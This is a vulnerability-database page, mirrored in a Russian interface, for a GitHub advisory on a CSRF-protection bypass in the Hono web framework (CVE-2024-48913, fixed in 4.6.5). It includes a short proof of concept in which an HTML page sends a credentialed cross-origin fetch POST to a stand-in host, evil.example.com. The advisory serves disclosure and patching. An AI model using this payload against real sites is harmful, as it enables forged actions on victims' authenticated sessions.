Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-2234-fmw7-43wr

Опубликовано: 15 окт. 2024
Источник: github
Github: Прошло ревью
CVSS3: 5.9

Описание

Hono allows bypass of CSRF Middleware by a request without Content-Type header.

Summary

Bypass CSRF Middleware by a request without Content-Type herader.

Details

Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

PoC

// server.js import { Hono } from 'hono' import { csrf }from 'hono/csrf' const app = new Hono() app.use(csrf()) app.get('/', (c) => { return c.html('Hello Hono!') }) app.post('/', async (c) => { console.log("executed") return c.text( await c.req.text()) }) Deno.serve(app.fetch)
<!-- PoC.html --> <script> async function myclick() { await fetch("http://evil.example.com", { method: "POST", credentials: "include", body:new Blob([`test`],{}), }); } </script> <input type="button" onclick="myclick()" value="run" />

Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.

await fetch("http://localhost:8000", { method: "POST", credentials: "include"});

Impact

Bypass csrf protection implemented with hono csrf middleware.

Ссылки

Пакеты

Наименование

hono

npm
Затронутые версииВерсия исправления

< 4.6.5

4.6.5

EPSS

Процентиль: 1%
0.00011
Низкий

5.9 Medium

CVSS3

CVE ID

CVE-2024-48913

Дефекты

CWE-352

Связанные уязвимости

nvd логотип

CVE-2024-48913

CVSS3: 5.9
nvd
8 месяцев назад

Hono, a web framework, prior to version 4.6.5 is vulnerable to bypass of cross-site request forgery (CSRF) middleware by a request without Content-Type header. Although the CSRF middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe. This can allow an attacker to bypass CSRF protection implemented with Hono CSRF middleware. Version 4.6.5 fixes this issue.

EPSS

Процентиль: 1%
0.00011
Низкий

5.9 Medium

CVSS3

CVE ID

CVE-2024-48913

Дефекты

CWE-352